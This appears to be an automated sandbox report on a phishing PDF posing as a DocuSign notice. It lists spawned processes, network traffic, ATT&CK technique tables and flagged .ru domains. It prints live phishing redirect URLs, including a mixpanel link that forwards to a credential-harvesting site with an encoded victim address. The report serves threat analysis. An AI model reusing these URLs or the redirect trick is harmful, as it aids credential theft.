cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1817&rtt_var=706&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1896&delivery_rate=1522419&cwnd=239&unsent_bytes=0&cid=19fc18734f921b21&ts=4264&x=0"
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_242.9.dr, chromecache_233.9.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_242.9.dr, chromecache_233.9.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 63864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56383 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56437
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56438
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56439
Source: unknownNetwork traffic detected: HTTP traffic on port 56457 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56431 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63882
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56363 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56451 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56416 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56445
Source: unknownNetwork traffic detected: HTTP traffic on port 56437 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56451
Source: unknownNetwork traffic detected: HTTP traffic on port 63876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56423 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56417 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56457
Source: unknownNetwork traffic detected: HTTP traffic on port 63871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56445 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56509
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56467
Source: unknownNetwork traffic detected: HTTP traffic on port 56439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56408 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56425 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 56467 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56438 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56509 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56363
Source: unknownNetwork traffic detected: HTTP traffic on port 63877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56408
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56406
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56402
Source: unknownNetwork traffic detected: HTTP traffic on port 56398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56375
Source: unknownNetwork traffic detected: HTTP traffic on port 56406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56430 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56416
Source: unknownNetwork traffic detected: HTTP traffic on port 56381 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56417
Source: unknownNetwork traffic detected: HTTP traffic on port 56413 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56413
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56381
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56382
Source: unknownNetwork traffic detected: HTTP traffic on port 63869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56383
Source: unknownNetwork traffic detected: HTTP traffic on port 63875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63864
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56423
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56425
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56430
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56398
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56431
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56392
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56393
Source: unknownNetwork traffic detected: HTTP traffic on port 63870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56394
Source: unknownNetwork traffic detected: HTTP traffic on port 56392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63872
Source: unknownNetwork traffic detected: HTTP traffic on port 63878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56391
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63875

System Summary

barindex
Source: Document_31055.pdfStatic PDF information: Image stream: 9
Source: classification engineClassification label: mal72.phis.winPDF@44/122@41/14
Source: Document_31055.pdfInitial sample: https\072\057\057protect\056docusign\056net\057report\055abuse\077e\075automjpfak9glbpl0zffi120ryx1dadb6k35szbg0mcvu\137bpasdp2f3hrl\0553db9\055yxr9jdthwvyspbrkjfvimbz2xmeqqggsxgppazrajnuo\055lnl7of7y0sk1q1cnoalx2stb2ujzcjs1umeh35h5zza060lgx3lbbf1cp3zxwwjvqufk2t6cqytbtnztlcndiad\0559cx682hlrvserakl\137jcjuzb3ctrkoeyvqng0ejbyxef01cq\137egl1fxuabmgcbjrm8hhpexk2egcv6c9hkp7\137wuvwb2wapknmij3ucp0kh\137bxnxlnwjw2do3vsvmgjxm54tczsqrohuj49xi9s0x2m5hbhv77v3p43r\055bpubfi8k8ohwsgpcpsthgmsmkucd0af0prb3vts1n2fmwna\046lang\075en
Source: Document_31055.pdfInitial sample: https\072\057\057protect\056docusign\056net\057report\055abuse\077e\075AUtomjpFak9GlbPL0zFFi120RyX1Dadb6k35Szbg0MCvU\137BPaSdP2F3Hrl\0553db9\055YXR9JdtHWvySPbrkjfVImbz2XMeQQggSxgPPAzRAJNuO\055LnL7oF7y0sk1q1cnOaLx2stb2ujZCJS1UMeH35H5zzA060LgX3lbBF1CP3zXwWJVqUfk2t6cQYTbtNztlcndiad\0559CX682hlRvsERaKL\137jCJuZB3cTRKoeYVqNG0ejByXeF01CQ\137eGL1FxuAbMGcBJRM8HHpExk2eGCv6C9hKP7\137WuvWb2waPknMIJ3ucP0Kh\137BXNXlNwjW2Do3VsVmgJxm54tCZSqROHuj49xi9s0X2m5HbHv77V3p43R\055bPUbfi8K8oHwsgPcpsThgmsMkucd0AF0prB3vtS1N2fmWnA\046lang\075en
Source: Document_31055.pdfInitial sample: https\072\057\057api\056mixpanel\056com\057track\057\077data\075eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0\075\046redirect\075https\0453A\0452F\0452Fmidiacentral\056com\056br\0452Foslksedhlabd\0452Fgyu\0452Fwio\0452Fblip\0452Fsepla\0452FGina\057bWR1bm5AZ2VvaW5zaWdodHMuY29t
Source: Document_31055.pdfInitial sample: https\072\057\057api\056mixpanel\056com\057track\057\077data\075eyjldmvudci6imutbwfpbdogw0fjdglvbibszxf1axjlzf0gumvjb25uzwn0iefkv29yzhmsiezhy2vib29rihrvifjvy2tlcmjvecatichjbgljaykilcjwcm9wzxj0awvzijp7inrva2vuijoiytq4mzy4ota0mtgzy2y0mdvkzwi5mdg4mwuxntrizdgilcjkaxn0aw5jdf9pzci6imxwcmlzzw5kb3jmqgphbmvpcmvkywxllmnvbsisimxpbmsioijodhrwczpcl1wvyxbwlnjvy2tlcmjvec5jb20ilcjjyw1wywlnbii6inryyw5zywn0aw9uywwifx0\075\046redirect\075https\0453a\0452f\0452fmidiacentral\056com\056br\0452foslksedhlabd\0452fgyu\0452fwio\0452fblip\0452fsepla\0452fgina\057bwr1bm5az2vvaw5zawdodhmuy29t
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057en\057articles\057How\055do\055I\055manage\055my\055email\055notifications
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057en\057guides\057declining\055to\055sign\055docusign\055signer\055guide
Source: Document_31055.pdfInitial sample: https\072\057\057www\056docusign\056com\057support
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057s\057articles\057How\055do\055I\055sign\055a\055DocuSign\055document\055Basic\055Signing\077language\075en\137US\046utm\137campaign\075GBL\137XX\137DBU\137UPS\1372211\137SignNotificationEmailFooter\046utm\137medium\075product\046utm\137source\075postsend
Source: Document_31055.pdfInitial sample: https\072\057\057www\056docusign\056com\057features\055and\055benefits\057mobile\077utm\137campaign\075GBL\137XX\137DBU\137UPS\1372211\137SignNotificationEmailFooter\046utm\137medium\075product\046utm\137source\075postsend
Source: Document_31055.pdfInitial sample: http\072\057\057www\056adviserinfo\056sec\056gov\057
Source: Document_31055.pdfInitial sample: https\072\057\057www\056docusign\056com\057features\055and\055benefits\057mobile\077utm\137campaign\075gbl\137xx\137dbu\137ups\1372211\137signnotificationemailfooter\046utm\137medium\075product\046utm\137source\075postsend
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057en\057articles\057how\055do\055i\055manage\055my\055email\055notifications
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057en\057guides\057Declining\055to\055sign\055DocuSign\055Signer\055Guide
Source: Document_31055.pdfInitial sample: https\072\057\057support\056docusign\056com\057s\057articles\057how\055do\055i\055sign\055a\055docusign\055document\055basic\055signing\077language\075en\137us\046utm\137campaign\075gbl\137xx\137dbu\137ups\1372211\137signnotificationemailfooter\046utm\137medium\075product\046utm\137source\075postsend
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-14 12-35-23-372.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document_31055.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1588,i,14734467309998307436,13739961970335841568,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://api.mixpanel.com/track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2384,i,12472687294183246176,5245290317952259585,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://api.mixpanel.com/track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1588,i,14734467309998307436,13739961970335841568,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2384,i,12472687294183246176,5245290317952259585,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Document_31055.pdfInitial sample: PDF keyword /JS count = 0
Source: Document_31055.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: A91fgfbla_11jperw_4js.tmp.0.drInitial sample: PDF keyword /JS count = 0
Source: A91fgfbla_11jperw_4js.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
Source: Document_31055.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Web Protocols
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://l4u8.yaalwgyl.ru/favicon.ico0%Avira URL Cloudsafe
https://wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru/XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHAC100%Avira URL Cloudmalware
https://midiacentral.com.br/favicon.ico0%Avira URL Cloudsafe
https://l4u8.yaalwgyl.ru/VDb0pu/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0016.t-0009.t-msedge.net
13.107.246.44
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      midiacentral.com.br
      108.167.132.254
      truetrue
        unknown
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          l4u8.yaalwgyl.ru
          172.67.186.162
          truetrue
            unknown
            edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            217.20.57.19
            truefalse
              high
              code.jquery.com
              151.101.2.137
              truefalse
                high
                wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru
                104.21.60.111
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      high
                      sni1gl.wpc.omegacdn.net
                      152.199.21.175
                      truefalse
                        high
                        www.google.com
                        142.250.185.132
                        truefalse
                          high
                          api.mixpanel.com
                          35.190.25.25
                          truefalse
                            high
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              x1.i.lencr.org
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  identity.nel.measure.office.net
                                  unknown
                                  unknownfalse
                                    high
                                    login.microsoftonline.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://a.nel.cloudflare.com/report/v4?s=ag3ws%2FF985H0zq9wg89%2Fkx5rND%2BlmktGl1PoKGTjJVe9%2FjUG4%2BOgsWS%2BPyAHI6phcId9L%2FSqpY0ymK60ZKyqePHZXQkiFqkyLpiZaHl0E1BFhmlev3DiI56lsBqMIQ%3D%3Dfalse
                                        high
